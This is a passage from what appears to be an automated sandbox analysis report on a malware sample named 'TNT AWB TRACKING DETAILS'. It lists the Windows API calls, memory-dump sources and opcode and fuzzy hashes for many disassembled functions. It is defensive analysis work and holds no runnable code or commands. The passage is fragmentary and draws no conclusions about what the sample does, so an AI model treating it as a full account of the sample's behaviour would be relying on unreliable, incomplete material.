                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                      • API String ID: 2574300362-4033151799
                                      • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                      • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                      • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                      • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                      APIs
                                      • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                      • __itow.LIBCMT ref: 004699CD
                                        • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                      • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                      • __itow.LIBCMT ref: 00469A97
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$__itow
                                      • String ID:
                                      • API String ID: 3379773720-0
                                      • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                      • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                      • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                      • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 00449A4A
                                      • ScreenToClient.USER32(?,?), ref: 00449A80
                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$ClientMoveRectScreen
                                      • String ID:
                                      • API String ID: 3880355969-0
                                      • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                      • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                      • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                      • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                      • String ID:
                                      • API String ID: 2782032738-0
                                      • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                      • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                      • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                      • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                      APIs
                                      • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                      • GetWindowRect.USER32(?,?), ref: 00441722
                                      • PtInRect.USER32(?,?,?), ref: 00441734
                                      • MessageBeep.USER32(00000000), ref: 004417AD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Rect$BeepClientMessageScreenWindow
                                      • String ID:
                                      • API String ID: 1352109105-0
                                      • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                      • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                      • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                      • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                      APIs
                                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                      • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                      • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                      • String ID:
                                      • API String ID: 3321077145-0
                                      • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                      • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                      • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                      • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                      APIs
                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                      • __isleadbyte_l.LIBCMT ref: 004208A6
                                      • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                      • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                      • String ID:
                                      • API String ID: 3058430110-0
                                      • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                      • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                      • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                      • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                      APIs
                                      • GetParent.USER32(?), ref: 004503C8
                                      • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                      • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                      • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Proc$Parent
                                      • String ID:
                                      • API String ID: 2351499541-0
                                      • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                      • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                      • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                      • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                      • TranslateMessage.USER32(?), ref: 00442B01
                                      • DispatchMessageW.USER32(?), ref: 00442B0B
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Message$Peek$DispatchTranslate
                                      • String ID:
                                      • API String ID: 1795658109-0
                                      • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                      • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                      • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                      • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                      APIs
                                      • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                        • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                        • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                        • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                      • GetCaretPos.USER32(?), ref: 004743B2
                                      • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                      • GetForegroundWindow.USER32 ref: 004743EE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                      • String ID:
                                      • API String ID: 2759813231-0
                                      • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                      • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                      • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                      • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                      APIs
                                        • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                      • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                      • _wcslen.LIBCMT ref: 00449519
                                      • _wcslen.LIBCMT ref: 00449526
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend_wcslen$_wcspbrk
                                      • String ID:
                                      • API String ID: 2886238975-0
                                      • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                      • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                      • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                      • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __setmode$DebugOutputString_fprintf
                                      • String ID:
                                      • API String ID: 1792727568-0
                                      • Opcode ID: 21db2ec1bcc2986c47425e22e021f250b78b3462fb6fb1bb1b9df07b86064711
                                      • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                      • Opcode Fuzzy Hash: 21db2ec1bcc2986c47425e22e021f250b78b3462fb6fb1bb1b9df07b86064711
                                      • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                      APIs
                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                      • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$Long$AttributesLayered
                                      • String ID:
                                      • API String ID: 2169480361-0
                                      • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                      • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                      • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                      • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                      APIs
                                        • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                        • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                        • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                      • lstrlenW.KERNEL32(?), ref: 00434CF6
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                      • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: lstrcmpilstrcpylstrlen$_malloc
                                      • String ID: cdecl
                                      • API String ID: 3850814276-3896280584
                                      • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                      • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                      • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                      • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                      APIs
                                        • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                      • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                      • _memmove.LIBCMT ref: 0046D475
                                      • inet_ntoa.WSOCK32(?), ref: 0046D481
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                      • String ID:
                                      • API String ID: 2502553879-0
                                      • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                      • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                      • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                      • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                      APIs
                                      • SendMessageW.USER32 ref: 00448C69
                                      • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                      • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                      • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$LongWindow
                                      • String ID:
                                      • API String ID: 312131281-0
                                      • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                      • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                      • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                      • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                      APIs
                                      • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                      • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
